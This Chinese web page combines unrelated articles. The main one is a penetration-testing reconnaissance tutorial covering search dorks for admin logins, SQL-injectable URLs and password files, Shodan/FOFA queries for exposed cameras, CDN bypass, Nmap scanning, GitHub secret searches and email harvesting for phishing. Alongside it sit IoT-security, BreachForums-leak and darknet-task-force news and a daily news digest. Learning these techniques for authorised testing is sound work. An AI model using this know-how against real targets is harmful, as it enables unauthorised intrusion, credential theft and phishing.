物联网设备的安全性存在设计上的“先天缺陷”且长期使用默认密码，极容易遭到黑客攻击。此外，随着OT网络中分配给高级物联网传感器的角色和身份迅速增加，这些与关键任务系统紧密关联的物联网设备正在成为黑客最青睐的高价值目标。 根据Forrester的最新报告《2023 年物联网安全状况》，物联网设备正在成为黑客攻击的头号载体和目标。 物联网攻击增速明显快于主流漏洞 卡巴斯基ICS CERT发现，在2022年下半年，工业领域计算机中有34.3%受到攻击影响，仅2021年上半年，针对物联网设备的攻击就高达15亿次。超过40%的OT系统曾阻止过恶意对象。SonicWall Capture Labs的威胁研究人员在2022年记录了1.123亿个物联网恶意软件实例，比2021年增长了87%。 资料来源：Forrester，2023年物联网安全状况   Airgap Networks首席执行官Ritesh Agrawal观察到，虽然物联网端点可能不是业务关键组件，但它们很容易被入侵成为恶意软件载体，殃及企业最有价值的系统和数据。他建议企业加强物联网端点安全的三个基本功：资产发现、微分段和身份管理。 物联网成为高价值目标的四大原因   物联网设备受到攻击不仅是因为它们容易攻击，而且往往是高价值目标。很多行业的物联网设备运行着关键任务，因此受害者更容易支付赎金。攻击者知道，任何工厂都无法承受长期停机的后果，因此勒索软件组织向制造企业索要的赎金金额是其他行业目标的两到四倍。调查显示，61%的攻击尝试和23%的勒索软件攻击主要针对OT系统。 Forrester调查了物联网设备为何成为如此高价值的目标，以及它们如何被用来对组织发起更广泛、更具破坏性的攻击。报告发现四个关键因素如下： 1.物联网设备的设计存在安全盲点。 大多数遗留的、当前安装的物联网设备在设计时并未将安全性作为优先事项。许多人缺乏重新刷新固件或加载新软件代理的选项。尽管有这些局限，仍然有保护物联网端点的有效方法。 第一个目标必须是消除物联网传感器和网络中的盲点。CrowdStrike物联网安全产品管理总监Shivan Mandalam在最近的一次采访中指出：“企业必须消除与不受管理或不受支持的遗留系统相关的盲点。通过提高IT和OT系统的可见性和分析能力，安全团队可以在对手利用问题之前快速识别和解决问题。” 目前北美市场的主要物联网安全系统和平台厂商包括AirGap Networks、Absolute Software、Armis、Broadcom、Cisco、CradlePoint、CrowdStrike、Entrust、Forescout、Fortinet、Ivanti、JFrog和Rapid7。去年在Falcon 2022上，CrowdStrike推出了增强型Falcon Insight，包括Falcon Insight XDR和Falcon Discover for IoT，后者针对工业控制系统(ICS)内部和之间的安全漏洞。 企业网络安全优先级调查统计数据  资料来源：Forrester，2023年物联网安全状况 Forrester的2022年调查数据显示，63%的全球高级安全决策者决定在2023年增加物联网安全预算，这表现为端点安全已经成为企业安全预算的最高优先级（上图）。 2.长期使用管理员密码（包括凭据）很常见。 人手不足的制造企业在物联网传感器上使用默认管理员密码极为常见。他们通常使用默认设置，因为制造企业的IT团队没有时间为每个传感器进行安全设置，或者压根不知道可以这么做。Forrester指出，这是因为许多物联网设备在初始化时不要求用户设置新密码。Forrester还指出，管理凭据在旧设备中通常无法更改。 因此，CISO、安全团队、风险管理专业人员和IT团队在其网络上拥有大量可用已知凭据访问的新旧设备。 提供基于身份的物联网安全解决方案的供应商有很多，例如Armis、Broadcom、Cisco、CradlePoint、CrowdStrike、Entrust、Forescout、Fortinet、Ivanti和JFrog。Ivanti是该领域的领导者，已成功开发并推出四种物联网安全解决方案：用于RBVM的Ivanti Neurons、用于UEM的Ivanti Neurons、用于医疗行业的Ivanti Neurons，它支持医疗物联网(IoMT)，以及Ivanti Neurons for IIoT（收购自Wavelink），用于保护工业物联网(IIoT)网络。 “根据IBM的数据，物联网设备正成为黑客的热门目标。2021年，物联网攻击占全球恶意软件攻击的12%以上，远高于2019年的1%，”Ivanti首席产品官Srinivas Mukkamala博士解释道：“为了解决这个问题，企业必须实施统一的端点管理(UEM)解决方案，该解决方案可以发现组织网络上的所有资产——甚至包括是休息室中支持Wi-Fi联网的烤面包机。” “UEM和基于风险的漏洞管理解决方案的结合对于实现无缝、主动的风险响应以修复组织环境中所有设备和操作系统上被积极利用的漏洞至关重要。”Mukkamala强调 3.几乎所有医疗、服务和制造企业都依赖传统的物联网传感 从医院科室和病房到车间，传统的物联网传感器是这些企业获取运营所需实时数据的支柱。同时这两个行业又都是高价值目标，攻击者首先会攻击其物联网网络以启动跨网络的横向移动。73%的联网IV泵是可破解的，50%的IP语音(VoIP)系统也是如此；总体而言，如今一家典型医院中50%的联网设备都存在严重风先险 Forrester指出，造成这些漏洞的主要原因之一是设备运行着失去技术支持的老旧操作系统，无法保护或更新这些操作系统。如果攻击者入侵了设备并且无法修补，会增加设备“变砖”的风险。 4.IoT的问题是I，而不是T。 物联网设备一旦接入互联网就存在安全风险。一位匿名网安全供应商透露，他们的一个制造业大客户发现有人从外部频繁扫描其内部一个IP地址。 调查发现该IP地址属于该企业大堂的安全摄像头，攻击者正在监控（员工）流量模式，研究如何从上班的员工人流中混入企业，然后物理访问内部网络并将恶意传感器植入网络。Forrester的调查显示，物联网设备已成为黑客命令和控制攻击的管道，或者成为僵尸网络的一部分，例如众所周知的Marai僵尸网络。 物联网攻击的真实案例 制造业企业普遍反映，他们不确定如何保护传统物联网设备及其可编程逻辑控制器(PLC)。PLC提供了运行其业务所需的丰富的实时数据流。IoT和PLC的设计目的是为了易于集成，而不是安全性，这使得任何没有全职网络安全人员的制造企业难以应对。 一家位于美国中西部的汽车零部件制造商遭到过大规模勒索软件攻击，该攻击始于其网络上未受保护的物联网传感器和摄像头遭到破坏。攻击者使用R4IoT勒索软件的变体初始渗透到该公司用于自动化HVAC、电力和设备预防性维护的物联网、视频系统和PLC组件中。 进入公司网络后，攻击者横向移动并用勒索软件感染了所有基于Windows的系统。攻击者还获得了管理员权限并禁用了Windows防火墙和第三方防火墙，然后通过网络将R4IoT可执行文件安装到机器上。 这次攻击导致该制造企业无法监控机器的热量、压力、运行状况和循环时间。勒索软件还冻结并加密了所有数据文件，使它们无法使用。更糟糕的是，攻击者威胁说，如果不支付赎金，他们将在24小时内将受害企业的所有定价、客户和生产数据发布到暗网上。 该制造商别无选择，只能支付赎金，因为其所在地区的网络安全人才并不知道如何应对攻击。攻击者也知道，成千上万的制造企业没有专业的网络安全团队来应对这种威胁，也不知道如何应对。这导致制造业成为物联网攻击受灾最严重的行业。而物联网设备成为黑客首选威胁载体的原因也很简单，因为它们没有受到保护。...

一.搜索引擎 由于传统的信息收集方法如端口扫描、目录扫描等会在服务器上留下大量的日志痕迹，在某些情况下还可能被安全设备拦截，因此能否在不惊动目标服务器的情况下，对目标网站收集尽可能多的信息呢？GoogleHacking，也叫Google Dorking，是一种利用谷歌搜索和其他搜索引擎来发现网站配置和计算机代码中的安全漏洞的计算机黑客技术。 搜索引擎可以完成端口扫描，目录扫描，C段，旁站等信息收集，所以将搜索引擎放在第一个来讲 1.Google hacking site：限制搜索范围为某一网站，例如：site:baidu.com "admin" 可以搜索 baidu.com 网站上包含关键词“admin”的页面。 inurl：限制关键字出现在网址的某个部分，例如：inurl:php?id= 可以搜索网址中包含 php?id=的页面。   intitle：限制关键字出现在页面标题中，例如：intitle:index of / 定位网站目录索引页面。   filetype：限制搜索特定文件类型，例如：filetype:pdf   site:example.com 可以搜索 example.com 网站上的 pdf 文件。   cache：查看 Google 对某个页面的快照，例如：cache:example.com 查看   Google 对 example.com 的快照。   案例语句 1.查找暴露在互联网的后台资产 intile:后台登录 inurl:login|admin|manage|member|admin_login|login_admin|s ystem|login|user|main|cms 2.搜索xxx.com的子域名信息 site:xiusafe.com 3.搜索互联网上的登录入口 intitle:登录 site:baidu.com intitle:登录 site:baidu.com -zhidao.baidu.com -baike. baidu.com -jingyan.baidu.com 4.查找互联网敏感文件 filetype:mdb|doc|xlsx|pdf 密码 filetype:xls 5.sql注入 inurl:php?id= site:tw 更多资料 https://ght.se7ensec.cn/# https://github.com/K0rz3n/GoogleHacking-Page   2.物联网搜索引擎 1).Shodan Shodan是一个知名的物联网搜索引擎，我们可以利用Shodan搜索和互联网关联的服务器、摄像头、打印机、路由器等设备。下表展示了Shodan关键词及说明。 实用案例演示 1.查找位于中国（.cn）的Nginx服务器： nginx country:cn 2.搜索位于南京的开放3389端口的服务器： port:3389 city:Nanjing 3.搜索位于中国南京且暴露在互联网上的海康威视摄像头： Hikvision-Webs country:cn city:Nanjing 4.查看全球的Cisco思科设备情况： isp:cisco 5.查看全球的华为设备情况： isp:huawei 2).ZoomEye ye中文名为“钟馗之眼”，它定位于网络空间搜索引擎，能对暴露在公网的主机设备及网站组件进行全方位搜索（只要有IP地址即可搜索到），发现其中的漏洞。ZoomEye和Shodan的区别是，ZoomEye目前侧重于Web层面的资产发现，而Shodan则侧重于主机层面的资产发现。 关键词 组件名称： app:组件名 ver:组件版本 端口： port:开放端口 操作系统： os:操作系统 服务： service:分析结果中的“服务名”字段 主机名： hostname:分析结果中的“主机名”字段 位置： country:国家或者地区代码 city:城市名称 IP地址： ip:搜索一个指定的IP地址 网站： site:网站域名 标题： title:页面标题 关键词： keywords:<meta name="Keywords"> 定义的页面关键词 描述： desc:<meta name="description"> 定义的页面说明 HTTP头： headers:HTTP 请求中的 Headers 3).FOFA FOFA是白帽汇公司推出的一款网络空间资产搜索引擎。它能够帮助企业客户迅速进行网络资产匹配、加快后续工作进程。例如，进行漏洞影响范围分析、应用分布统计、应用流行度排名统计等操作。 基本查询语法 我们直接输入查询语句，从标题、HTML内容、HTTP头信息、URL字段中进行搜索： title="abc" 从标题中搜索abc header="abc" 从HTTP头中搜索abc body="abc" 从HTML正文中搜索abc domain="qq.com" 搜索根域名带有qq.com的网站 host=".gov.cn" 从URL中搜索.gov.cn port="443" 查找对应443端口的资产 ip="1.1.1.1" 搜索IP地址的信息 protocol="https" 搜索制定 协议类型(在开启端口扫描的情况下有效) city="Beijing" 搜索指定城市的资产 region="Zhejiang" 搜索指定行政区的资产 country="CN" 搜索指定国家(编码)的资产 cert="google" 搜索证书(https或者imaps等)中带有google的资产banner=users && protocol=ftp 搜索FTP协议中带有users文本的资产type=service 搜索所有协议资产，支持subdomain和service两种 os=windows 搜索Windows资产 server=="Microsoft-IIS/7.5" 搜索IIS 7.5服务器 app="海康威视-视频监控" 搜索海康威视设备 after="2017" && before="2017-10-01" 时间范围段搜索org="Amazon.com, Inc." 搜索指定org(组织)的资产 base_protocol="udp" 搜索指定udp协议的资 二.域名信息收集 1.whois查询 域名的 whois 信息可以提供以下作用： 确认域名的所有者、注册商、注册日期和到期日期等基本信息。 了解域名的注册历史，对于判断一个域名的可信度和信誉程度有很大帮助。 判断一个域名是否正在被使用及其使用方式，是否涉及到滥用、欺诈等问题。 可以通过 whois 信息获得自己的域名信息，及时检查域名是否即将到期，避免域名失效带来的影响 站长之家 https://whois.chinaz.com/ viewdns https://viewdns.info/ 2.备案信息查询 只要使用国内的服务器搭建网站都必须进行网站备案才可以进行正常访问，这是我国的一项管理要求，主要是为了防止不法分子在网上从事非法的宣传或经营活动，打击不良互联网信息的传播。所以针对搭建在国内的网站也可以进行备案信息查询。 备案信息 资产收集 ● 站长之家 https://icp.chinaz.com   ● 天眼查 https://www.tianyancha.com/   ● 企查查   ● 爱企查   ● ICP 备案查询网 http://www.beianbeian.com/   ● 爱站备案查询 https://icp.aizhan.com/   ● 域名助手备案信息查询 http://cha.fute.com/inde   3.子域名信息收集 一般在渗透测试前会先对目标的子域名资产进行收集，收集可以利用互联网上的第三方接口，也可以直接使用字典进行子域名“爆破”。 (1) 在线字典爆破工具 目前互联网上存在一些在线子域名爆破工具，使用起来也比较方便，唯一的缺点就是字典和爆破速度不够强大，用户不能自定义字典，不过优点是具有匿名性，可以防止被溯源。 (2)本地字典爆破工具 除了可以使用一些在线爆破工具，还可以使用一些本地的子域名爆破工具，部分工具可以灵活地加载本地的字典来进行爆破。比较常用的本地子域名爆破工具有：SubDomainsBrute、LayerDomainFinder子域名挖掘机 (3)API子域名查询接口 除了手动使用这些API接口来进行查询，也可以使用集成了API的工具来进行一键查询，比较有名的项目就是 OneForAll，这是一款功能强大的子域名收集工具，核心代码利用的是各种第三方的接口，所以在查询数量上比较有优势。 三. 服务器信息收集 随着网络的发展，很多网站都开始使用CDN，CDN分发网络将源站的内容发布到接近用户的网络“边缘”，用户可以就近获取所需数据，不仅降低了网络的拥塞状况、提高了请求的响应速度，也能够减少源站的负载压力。在加速网站访问的同时也让渗透测试人员难以获取真实的服务器IP地址，所以CDN的判断和绕过是服务器信息收集的第一步，只有绕过了CDN才可以拿到服务器的真实IP信息。 域名—>IP 1.CDN判断方法 ping命令 直接使用 ping 命令有时候也可以查询到目标网站是否使用了CDN。 有时，可以直接看到waf、cdn等字样的域名，这就表示目标服务器使用了CDN。不过有很多厂商可能只让www主站域名使用CDN，空域名或者子域名并没有使用CDN缓存，所以这种情况下直接使用ping xxx.com 就有可能得到真实的IP地址。 2.nslookup查询 不仅可以使用 ping 命令来对目标网站进行CDN判断，也可以使用nslookup命令查询域名的解析情况，如果一个域名解析结果为多个IP地址，那么多半使用了CDN 。 2.绕过CDN找到真实IP的8种方法 正常情况下，通过cmd命令可以快速找到域名对应IP，最常见的命令如ping、nslookup。但很多站点出于用户体验和安全的角度，使用CDN加速，将域名解析到CDN，这时候就需要绕过CDN来查找真实IP。 一、DNS历史解析记录 查询域名的历史解析记录，可能会找到网站使用CDN前的解析记录，从而获取真实ip，相关查询的网站有： iphistory：https://viewdns.info/iphistory/ DNS查询：（https://dnsdb.io/zh-cn/） 微步在线：（https://x.threatbook.cn/） 域名查询：（https://site.ip138.com/） DNS历史查询：（https://securitytrails.com/） Netcraft：https://sitereport.netcraft.com/?url=github.com IP History 查询记录： 二、查找子域名 很多时候，一些重要的站点会做CDN，而一些子域名站点并没有加入CDN，而且跟主站在同一个C段内，这时候，就可以通过查找子域名来查找网站的真实IP。 常用的子域名查找方法和工具： 1、搜索引擎查询：如Google、baidu、Bing等传统搜索引擎，site:http://baidu.cominurl:http://baidu.com，搜target.com|公司名字。 2、一些在线查询工具，如： http://tool.chinaz.com/subdomain/ http://i.links.cn/subdomain/     http://subdomain.chaxun.la/ http://searchdns.netcraft.com/ https://www.virustotal.com/ 3、 子域名暴力猜解 子域名暴力工具： Layer子域名挖掘机 wydomain：https://github.com/ring04h/wydomain     subDomainsBrute:https://github.com/lijiejie/ Sublist3r:https://github.com/aboul3la/Sublist3r 三、网站邮件头信息 比如说，邮箱注册，邮箱找回密码、RSS邮件订阅等功能场景，通过网站给自己发送邮件，从而让目标主动暴露他们的真实的IP，查看邮件头信息，获取到网站的真实IP。 四、网络空间安全引擎搜索 通过关键字或网站域名，就可以找出被收录的IP，很多时候获取到的就是网站的真实IP。 1、钟馗之眼：https://www.zoomeye.org 2、Shodan：https://www.shodan.io 3、Fofa：https://fofa.so ZoomEy搜索： 五、利用SSL证书寻找真实IP 证书颁发机构(CA)必须将他们发布的每个SSL/TLS证书发布到公共日志中，SSL/TLS证书通常包含域名、子域名和电子邮件地址。因此SSL/TLS证书成为了攻击者的切入点。 SSL证书搜索引擎： https://censys.io/ipv4?q=github.com 六、国外主机解析域名 大部分 CDN 厂商因为各种原因只做了国内的线路，而针对国外的线路可能几乎没有，此时我们使用国外的DNS查询，很可能获取到真实IP。 国外多PING测试工具： https://asm.ca.com/zh_cn/ping.php http://host-tracker.com/ http://www.webpagetest.org/ https://dnscheck.pingdom.com/ 国外多ping网站测试： 七、扫描全网 通过Zmap、masscan等工具对整个互联网发起扫描，针对扫描结果进行关键字查找，获取网站真实IP。 1、ZMap号称是最快的互联网扫描工具，能够在45分钟扫遍全网。 https://github.com/zmap/zmap 2、Masscan号称是最快的互联网端口扫描器，最快可以在六分钟内扫遍互联网。 https://github.com/robertdavidgraham/masscan 八、配置不当导致绕过 在配置CDN的时候，需要指定域名、端口等信息，有时候小小的配置细节就容易导致CDN防护被绕过。 案例1：为了方便用户访问，我们常常将www.test.com和test.com解析到同一个站点，而CDN只配置了www.test.com，通过访问test.com，就可以绕过 CDN 了。 案例2：站点同时支持http和https访问，CDN只配置 https协议，那么这时访问http就可以轻易绕过。 3.端口信息探测 端口信息探测是指对目标服务器资产进行开放端口号的穷举扫描，以了解某台计算机的弱点，并了解其提供的计算机网络服务类型。一般在渗透测试中常使用Nmap工具对目标网站进行端口扫描，Nmap的英文全称是“Network Mapper”，中文翻译过来就是“网络映射器”。Nmap是一款开源的端口扫描神器，它可以快速地扫描大型网络，也可以扫描单个主机。 1）渗透测试中的常见端口 端口如同一个房间的门，这个房间有多少个门呢？有65536个之多，也就是说端口的取值范围是0～65535个。本地操作系统会给那些有需求的进程分配协议端口，每个协议端口均有一个正整数标识，如80、139、445等，一般在渗透测试中，我们需要关注如表3-3所示的常见端口及协议。 这些端口可能存在对应的漏洞，这样就可以通过端口入侵到目标服务器中。 2）Nmap简单扫描 -sS：进行 TCP SYN（半开放式）扫描。这是一种常用的扫描方式，通过发送 TCP SYN包，判断目标主机的端口是否开放。 -sT：进行 TCP 连接扫描。这种扫描方式也是基于 TCP，通过建立 TCP 连接，判断目标主机的端口是否开放。 -sU：进行 UDP 扫描。UDP 是一种无连接的协议，因此不能像 TCP 一样建立连接来确定目标主机的端口是否开放。这种扫描方式需要发送 UDP 数据包，通过响应的数据包 判断端口是否开放。 -O：进行操作系统信息探测。通过使用不同的特征扫描目标主机，判断其使用的操作 系统。 -p：指定端口扫描范围。可以指定端口范围、单个端口或多个离散的端口。 -A：激活“操作系统指纹识别”、“版本检测”、“脚本扫描”等高级扫描选项。 -sV：进行服务版本检测。这种扫描方式可以探测出目标主机运行的具体服务以及其版 本号。 -T：设置扫描速度。可以设置不同的速度等级，以适应不同的扫描环境。速度级别从 0 到 5，级别越高，扫描速度越快，但也越容易被防火墙拦截 从扫描结果可以看出192.168.239.135目标服务器开放着21、23、135、445、3389、49152等端口，在Nmap进行端口扫描的时候，其会把扫描到的端口信息反馈回来，我们从反馈回来的信息就可以判断目标端口情况，具体状态含义可以参考下表返回状态及说明所示 3） Zenmap使用 4）脚本使用 如果没有Nmap工具，也可以使用最原始的脚本发起Ping请求。 4.操作系统类型探测 1）使用TTL值进行系统探测 不同的操作系统默认的TTL（Time To Live）值是不同的，因此通过Ping命令返回的TTL值加上 traceroute 获得的跳转节点数就能算出目标节点设置的TTL数，从而推测出目标节点的操作系统类型。比如，我们要探测10.20.24.244的操作系统类型，具体可以参照如下步骤进行操作。操作系统类型探测如下图所示 从中可以看到，从本地到目标主机一共经过了1-1=0跳，然后尝试直接Ping这个IP地址，测试目标主机连通性如图所示 Ping 返回的TTL为64，最后加上之前的0跳，所以目标主机的最终TTL值为：64+0=64，这表明目标主机是一台Linux操作系统的主机。操作系统和TTL对应关系如表所示 2） 使用Nmap进行系统探测 Nmap不仅是一款端口扫描工具，还可以对主机的服务及版本进行识别和探测。使用-O参数即可启用操作系统类型检测。Nmap操作系统类型探测如图所示 3）搜索引擎 四.Web信息收集 1.Web指纹识别 指纹识别是指网站CMS（Content Management System）内容管理系统的探测、计算机操作系统及Web 容器的指纹识别等。应用程序一般在HTML、JS、CSS等文件中包含一些特征码，这些特征码就是所谓的指纹。当碰到其他网站也存在此特征时，就可以快速识别出该程序，所以叫作指纹识别。 1) 文件内容匹配 WordPress是全球比较流行的一个WebCMS，它是由PHP语言编写的，在WordPress搭建的网站中就可以找到WordPress相关的字样信息。WordPress指纹如图所示(F12键)。 2)第三方插件 Firefox 插件 Wappalyzer 3)在线网站 CMS 漏洞 https://github.com/s7ckTeam/Glass https://github.com/EdgeSecurityTeam/EHole   定位版本对应已知漏洞检查   CMS 未知漏洞挖掘   显示网站使用的技术   https://whatcms.org/   https://builtwith.com/   2.敏感目录扫描 渗透测试中常常会对目标网站进行目录扫描，通过穷举字典的方法对目标进行目录探测，一些安全性脆弱的网站往往会被扫描出如管理员后台、网站备份文件、文件上传页面或者其他重要的文件信息，攻击者可以直接将这些敏感信息下载到本地来进行查看。 网站的三种部署模式 1.主域名与子域名的方式 a.com 1.a.com 2.目录 a.com a.com/admin/ 3.端口 a.com a.com:8080 所以对Web目录进行探测在渗透测试中是非常重要的一步，这有助于让我们对资产进行更深入的了解。渗透测试中对目标网站进行目录扫描的方法有很多，不过原理无外乎就是字典穷举，与其找一个好用的扫描工具，不如把重点放在如何构建自己的目录字典上。 Web目录扫描工具较多，列举下述几个 1）Dirsearch Dirsearch是一个使用Python编写的Web目录扫描工具，其自带的字典也比较强大，字典数目有6000多个，Dirsearch扫描的效率也很高，虽然字典的数量庞大，但是扫描完一个站点往往连一分钟都不到，下图就是使用Dirsearch来扫描靶机的效果。 2）御剑 3）gobuster 3.旁站信息收集 旁站指的是目标域名IP下的其他网站信息，可以使用一些在线工具来进行旁站查询。 1）爱站IP反查域名（ https://icp.aizhan.com/） 2）站长之家（https://icp.chinaz.com） 3）FOFA ip="121.196.37.183" && type="subdomain" 4.C段信息收集 C段信息收集指的是探测目标服务器局域网段下的其他资产信息，在早期主机运营商防护不够的时候，往往拿下C段的资产就可以对C段下的其他资产进行ARP嗅探劫持。 1).FOFA ip="121.196.37.1/24" && type="subdomain 2)工具-webfinder 五.其他信息收集 1.GitHub信息收集 我们可以使用前面学到的谷歌搜索语法来查找GitHub上面的敏感信息，如： password @163.com site:github.com 但是这样搜索的结果并不是很全面，所以最好的方式是使用GitHub自带的搜索，在左上角输入框内填写关键词，然后切换到如图所示的GitHub信息收集页面。 常见搜索的关键词如下： Linux密码 mysql数据库 password smtp password mysql password ssh password dbpass dbname 关键词这一块很灵活，读者朋友们可以根据自己的实际需求来自由发挥。 2.邮箱信息收集 在渗透测试过程中，收集邮箱也是不可缺少的一步，黑客收集邮箱后可以方便对这些邮箱进行定向“钓鱼”攻击。除了使用钓鱼攻击，还可以使用收集到的邮箱来爆破邮箱系统或者其他的登录系统。那么如何来收集互联网上的邮箱信息呢？最简单的方法就是直接使用搜索引擎来搜索，可以使用如下关键词查找到互联网上的邮箱信息： mail @xxxx.com 可供选择的搜索引擎有很多，百度、搜狗、谷歌、必应、雅虎、领英等都是不错的搜索邮箱的工具，当然也有一些小工具集成了这些功能，如7kbscan编写的EmailSniper邮箱据介绍就是一个不错的工具。EmailSniper执行样例如图所示。 3.社交 QQ、weibo、支付宝、脉脉、咸鱼、短视频、人人、贴吧、论坛 外网信息，推特、ins、fb 等 4.注册过的网站 https://www.reg007.com/ 5.默认密码 https://default-password.info/ http://routerpasswords.com 6.网页缓存 http://www.cachedpages.com/ 7.邮箱钓鱼 Email http://24mail.chacuo.net/enus  ...

BreachForums.vc在臭名昭著的ShinyHunters黑客的控制下卷土重来，这些黑客与原BreachForums的管理团队进行合作。 在旧的BreachForums论坛被联邦调查局查封之后，其所有者PomPomPurin（真名：Conor Brian Fitzpatrick）在纽约被捕，后来，因为担心数据被FBI掌握，继任管理员Baphomet宣布关闭旧的BreachForums论坛。 现在，新恢复的论坛已成为数据泄露的受害者，导致4202多名注册会员的个人信息暴露。 OnniForums的管理员宣布入侵了BreachForums.vc 在Telegram上的一次交流中，一位名为“Weep”（The Jacuzzi聊天的版主之一）的网友证实了网络攻击的发生。Weep向BreachForums.vc的成员发表讲话，并将数据泄露归因于名为OnniForums的竞争对手论坛，该论坛是一个专注于安全和匿名的暗网论坛。Weep敦促论坛成员重置密码，并透露黑客利用了MyBB论坛程序的0day漏洞。 与此同时，据称来自OnniForums官方推特账户的推文声称对这次袭击负责。来自同一论坛的另一条推文声称他们参与了破坏另一个名为“Exposed”的黑客论坛。值得注意的是，2022年5月，ExposedForum上泄露了一个部分数据库，其中包含来自现已被FBI查封的RaidForums的46万多名成员的详细信息。 泄露的数据包括4202名注册会员的信息 经多位用户确认，泄露数据是真实的，包括4202名注册会员的信息。 泄露的信息包括以下内容：登录密钥、用户名、电子邮件地址、IP地址、密码哈希、注册日期、成员的上次访问和帖子、帖子数和上次活动、社交媒体、个人资料链接等等。 BreachForums曾因促进被盗数据的讨论和交易而臭名昭著，该论坛重新启动后再次成为网络安全问题的焦点。 BreachForums.vc论坛现已恢复访问 BreachForums.vc自2023年6月19日星期一凌晨以来一直处于离线状态，但目前，该论坛已恢复在线。新的公告透露，数据泄露是由竞争对手的黑客论坛实施的，该论坛利用了免费开源论坛软件MyBB中的0day漏洞。 公告介绍，BreachForums.vc仍处于论坛的早期阶段，他们已经必须每天7*24处理来自竞争对手的DDOS攻击。同一个人在服务器上发现了MyBB的备份，其中包含约4000的电子邮件、密码（使用argon2i进行哈希处理）和IP（主要是VPN/Tor）。 公告表示，目前无法确定现在有多少人可以访问用户数据库。为了以防万一，请用户重设密码。并称，有些人担心论坛会消失，但他们不会，他们正在为这个错误承担全部责任，并将确保生存下去。...

美国政府成立了一个新的打击加密货币犯罪的特别工作组，由来自不同联邦机构的五名调查员组成。 “暗网市场和数字货币犯罪特别工作组”成立于6月15日，旨在“瓦解和摧毁“那些利用数字货币提供的“匿名外观”进行贩毒、洗钱和其他犯罪的犯罪组织。 其活动暂时将仅限于亚利桑那州。 美国移民和海关执法局网站周二分享的一份新闻稿称：“随着这些犯罪活动和组织变得更加复杂，执法工具、资源和情报必须适应，不得不进行调整。” > U.S. Attorney and Federal Law Enforcement Partners Announce Formalization of Darknet Marketplace and Digital Currency Crimes Task Force [@DHSgov](https://twitter.com/DHSgov?ref_src=twsrc%5Etfw) [@DEAPHOENIXDiv](https://twitter.com/DEAPHOENIXDiv?ref_src=twsrc%5Etfw) [@IRS\_CI](https://twitter.com/IRS_CI?ref_src=twsrc%5Etfw) [@USPISpressroom](https://twitter.com/USPISpressroom?ref_src=twsrc%5Etfw) > > — US Attorney Arizona (@USAO\_AZ) [June 16, 2023](https://twitter.com/USAO_AZ/status/1669760960167387136?ref_src=twsrc%5Etfw) 该交叉机构包括来自国土安全部（DHS）、国税局刑事调查组（IRS-CI）、美国缉毒署（DEA）、司法部（DOJ）和美国邮政检查局（USPS）的特工。 多年来，这五个机构都完成了一系列与加密货币有关的刑事调查，加密货币作为绕过传统金融体系制衡的工具，正在不断增长。 例如，去年，司法部追回了2018年从加密货币交易所Bitfinex盗窃的36亿美元比特币，这是历史上最大的一次金融扣押行动。同年晚些时候，该部门查获了与丝绸之路（Silk Road）相关的50,000个比特币(BTC)，”丝绸之路“是一个现已不复存在的暗网市场，利用比特币促进毒品、武器和其他非法物品的交易。 “DEA致力于拯救生命，”DEA负责的特别探员Cheri Oz说。“隐藏在暗网中的毒贩将被这个特别工作组积极锁定并揭穿。” 与此同时，IRS-CI特别负责人Al Childress表示，他的部门“正在越来越多地投入更多的调查时间和特工专业知识来应对暗网和加密货币犯罪。” 根据Chainaanalysis的数据，虽然通过加密货币相关犯罪窃取的资金数额每年都在增长，但其在加密货币相关交易绝对总额中所占的份额持续下降。 此外，美国财政部去年在一份风险评估报告中证实，数字资产被用于洗钱的情况仍然远少于法定货币。 尽管如此，财政部还在4月份强调了与去中心化金融（DeFi）生态系统相关的“国家安全”风险，因为“窃贼”和“勒索软件行为者”也可以利用它来洗钱。...

6月24日，农历五月初七，星期六 在这里，每天60秒读懂世界 1、多地陆续公布2023高考分数线：吉林一本文科485、理科463。宁夏一本文科488、理科397。江西一本文科533、理科518。云南一本文科530、理科485。内蒙古一本文科468、理科434。上海本科录取控制分数线405分； 2、中国驻美国使领馆：对受疫情影响暂时失去入境功能的10年多次签证给予补偿； 3、22日，辽宁营口市一钢铁企业发生烫伤事故致4死5伤，专家组初步认定系设备故障所致，两年前曾因转炉喷爆致2死1伤； 4、23日凌晨，辽宁庄河市蓉花山镇一男子因家庭琐事将哥哥一家六口杀害，警方：嫌疑人已被捉获； 5、23日中午，河南新密市新华路办事处东大街一处门面房因液化气泄漏引发爆炸，致房屋坍塌，4人受伤；北京：集中开展对餐饮等非居民用户的燃气安全检查，存燃气安全隐患拒不整改将暂停供气或限制购气； 6、深圳：已收到1635件个人破产申请，原因包括借钱炒股、经营不善等； 7、美国3M公司涉嫌污染公共供水系统，将赔偿高达740亿元：涉及灭火泡沫中的PFAS化学物质，极难降解，进血液会长久积存； 8、沙特正式宣布：退出2030年世界杯申办工作。目前剩下西班牙-葡萄牙-摩洛哥三国联办和乌拉圭-阿根廷-巴拉圭-智利四国联办这两个候选方案； 9、外媒：也门过去两天遭暴雨袭击，已致12人死亡8人失踪8人受伤；美欧科学家：外星人可能正利用超新星爆炸引起人类注意； 10、莫迪在美国放出豪言：印度很快将是世界第三大经济体！去年GDP增长6.7%，已超英国成世界第五； 11、印尼总统：印尼决定取消对159个国家及地区的免签政策，仅另外9个东盟成员国和东帝汶的旅客可继续免签政策； 12、韩媒：韩国越南商定建立稀土类等关键矿物供应链合作体系，并正式开展碳减排量跨境交易合作； 13、美国海岸警卫队确认：泰坦号深潜器发生了灾难性内爆，5名乘员全部死亡，完全毁灭只在1/20秒内； 14、西方官员称乌反攻早期"低于预期"，乌官员：主要反攻还没开始，秋冬再看成果。俄防长：将在6月底完成预备役部队组建工作； 15、越南公安部：美国恐怖组织成员奉命渗透到越南，策划多乐省警局袭击，已有47人被捕；美国"里根"号航母将于25日下午停靠越南港口，停留至6月30日，越方称"正常友好交流"； 【微语】有付出，才有回报，这是亘古不变的真理，莫贪便宜，一定要非常坚信天下没有免费的午餐。...

